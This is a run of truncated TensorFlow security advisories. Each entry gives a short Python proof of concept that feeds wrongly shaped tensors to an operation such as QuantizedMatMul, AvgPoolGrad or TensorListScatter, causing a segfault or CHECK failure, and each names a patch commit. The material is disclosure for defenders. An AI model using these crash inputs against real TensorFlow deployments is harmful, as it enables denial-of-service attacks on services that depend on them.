ghsa

### Impact If `QuantizedMatMul` is given nonscalar input for: - `min_a` - `max_a` - `min_b` - `max_b` It gives a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf Toutput = tf.qint32 transpose_a = False transpose_b = False Tactivation = tf.quint8 a = tf.constant(7, shape=[3,4], dtype=tf.quint8) b = tf.constant(1, shape=[2,3], dtype=tf.quint8) min_a = tf.constant([], shape=[0], dtype=tf.float32) max_a = tf.constant(0, shape=[1], dtype=tf.float32) min_b = tf.constant(0, shape=[1], dtype=tf.float32) max_b = tf.constant(0, shape=[1], dtype=tf.float32) tf.raw_ops.QuantizedMatMul(a=a, b=b, min_a=min_a, max_a=max_a, min_b=min_b, max_b=max_b, Toutput=Toutput, transpose_a=transpose_a, transpose_b=transpose_b, Tactivation=Tactivation) ``` ### Patches We have patched the issue in GitHub commit [aca766ac7693bf29ed0df55ad6bfcc78f35e7f48](https://github.com/tensorflow/tensorflow/commit/aca766ac7693bf29ed0df55ad6bfcc78f35e7f48). The fix will be ...

### Impact If `QuantizedBiasAdd` is given `min_input`, `max_input`, `min_bias`, `max_bias` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf out_type = tf.qint32 input = tf.constant([85,170,255], shape=[3], dtype=tf.quint8) bias = tf.constant(43, shape=[2,3], dtype=tf.quint8) min_input = tf.constant([], shape=[0], dtype=tf.float32) max_input = tf.constant(0, shape=[1], dtype=tf.float32) min_bias = tf.constant(0, shape=[1], dtype=tf.float32) max_bias = tf.constant(0, shape=[1], dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=out_type) ``` ### Patches We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0). The fix will be included in TensorFlow 2.10.0. We will also c...

### Impact If `FakeQuantWithMinMaxVars` is given `min` or `max` tensors of a nonzero rank, it results in a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf num_bits = 8 narrow_range = False inputs = tf.constant(0, shape=[2,3], dtype=tf.float32) min = tf.constant(0, shape=[2,3], dtype=tf.float32) max = tf.constant(0, shape=[2,3], dtype=tf.float32) tf.raw_ops.FakeQuantWithMinMaxVars(inputs=inputs, min=min, max=max, num_bits=num_bits, narrow_range=narrow_range) ``` ### Patches We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tens...

### Impact If `QuantizedInstanceNorm` is given `x_min` or `x_max` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf output_range_given = False given_y_min = 0 given_y_max = 0 variance_epsilon = 1e-05 min_separation = 0.001 x = tf.constant(88, shape=[1,4,4,32], dtype=tf.quint8) x_min = tf.constant([], shape=[0], dtype=tf.float32) x_max = tf.constant(0, shape=[], dtype=tf.float32) tf.raw_ops.QuantizedInstanceNorm(x=x, x_min=x_min, x_max=x_max, output_range_given=output_range_given, given_y_min=given_y_min, given_y_max=given_y_max, variance_epsilon=variance_epsilon, min_separation=min_separation) ``` ### Patches We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorF...

### Impact The implementation of `Conv2DBackpropInput` requires `input_sizes` to be 4-dimensional. Otherwise, it gives a `CHECK` failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf strides = [1, 1, 1, 1] padding = "SAME" use_cudnn_on_gpu = True explicit_paddings = [] data_format = "NHWC" dilations = [1, 1, 1, 1] input_sizes = tf.constant([65534,65534], shape=[2], dtype=tf.int32) filter = tf.constant(0.159749106, shape=[3,3,2,2], dtype=tf.float32) out_backprop = tf.constant(0, shape=[], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_sizes, filter=filter, out_backprop=out_backprop, strides=strides, padding=padding, use_cudnn_on_gpu=use_cudnn_on_gpu, explicit_paddings=explicit_paddings, data_format=data_format, dilations=dilations) ``` ### Patches We have patched the issue in GitHub commit [50156d547b9a1da0144d7babe665cf690305b33c](https://github.com/tensorflow/tensorflow/commit/50156d547b9a1da0144d7babe665cf690305b33c)....

### Impact The implementation of `AvgPoolGrad` does not fully validate the input `orig_input_shape`. This results in a `CHECK` failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf ksize = [1, 2, 2, 1] strides = [1, 2, 2, 1] padding = "VALID" data_format = "NHWC" orig_input_shape = tf.constant(-536870912, shape=[4], dtype=tf.int32) grad = tf.constant(.0890338004362538, shape=[1,5,7,1], dtype=tf.float64) tf.raw_ops.AvgPoolGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format) ``` ### Patches We have patched the issue in GitHub commit [3a6ac52664c6c095aa2b114e742b0aa17fdce78f](https://github.com/tensorflow/tensorflow/commit/3a6ac52664c6c095aa2b114e742b0aa17fdce78f). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For ...

### Impact If `QuantizedAdd` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf Toutput = tf.qint32 x = tf.constant(140, shape=[1], dtype=tf.quint8) y = tf.constant(26, shape=[10], dtype=tf.quint8) min_x = tf.constant([], shape=[0], dtype=tf.float32) max_x = tf.constant(0, shape=[], dtype=tf.float32) min_y = tf.constant(0, shape=[], dtype=tf.float32) max_y = tf.constant(0, shape=[], dtype=tf.float32) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y, Toutput=Toutput) ``` ### Patches We have patched the issue in GitHub commit [49b3824d83af706df0ad07e4e677d88659756d89](https://github.com/tensorflow/tensorflow/commit/49b3824d83af706df0ad07e4e677d88659756d89). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected...

### Impact If `QuantizedAvgPool` is given `min_input` or `max_input` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf ksize = [1, 2, 2, 1] strides = [1, 2, 2, 1] padding = "SAME" input = tf.constant(1, shape=[1,4,4,2], dtype=tf.quint8) min_input = tf.constant([], shape=[0], dtype=tf.float32) max_input = tf.constant(0, shape=[1], dtype=tf.float32) tf.raw_ops.QuantizedAvgPool(input=input, min_input=min_input, max_input=max_input, ksize=ksize, strides=strides, padding=padding) ``` ### Patches We have patched the issue in GitHub commit [7cdf9d4d2083b739ec81cfdace546b0c99f50622](https://github.com/tensorflow/tensorflow/commit/7cdf9d4d2083b739ec81cfdace546b0c99f50622). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Plea...

### Impact When `tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient` receives input `min` or `max` of rank other than 1, it gives a `CHECK` fail that can trigger a denial of service attack. ```python import tensorflow as tf arg_0=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None) arg_1=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None) arg_2=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None) arg_3=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None) arg_4=8 arg_5=False arg_6=None tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient(gradients=arg_0, inputs=arg_1, min=arg_2, max=arg_3, num_bits=arg_4, narrow_range=arg_5, name=arg_6) ``` ### Patches We have patched the issue in GitHub commit [f3cf67ac5705f4f04721d15e485e192bb319feed](https://github.com/tensorflow/tensorflow/commit/f3cf67ac5705f4f04721d15e485e192bb319feed). The fix will be included in TensorFlow 2.10.0. We will also cherrypic...

### Impact When `TensorListScatter` and `TensorListScatterV2` receive an `element_shape` of a rank greater than one, they give a `CHECK` fail that can trigger a denial of service attack. ```python import tensorflow as tf arg_0=tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None) arg_1=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536) arg_2=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536) arg_3='' tf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1, element_shape=arg_2, name=arg_3) ``` ### Patches We have patched the issue in GitHub commit [bb03fdf4aae944ab2e4b35c7daa051068a8b7f61](https://github.com/tensorflow/tensorflow/commit/bb03fdf4aae944ab2e4b35c7daa051068a8b7f61). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https...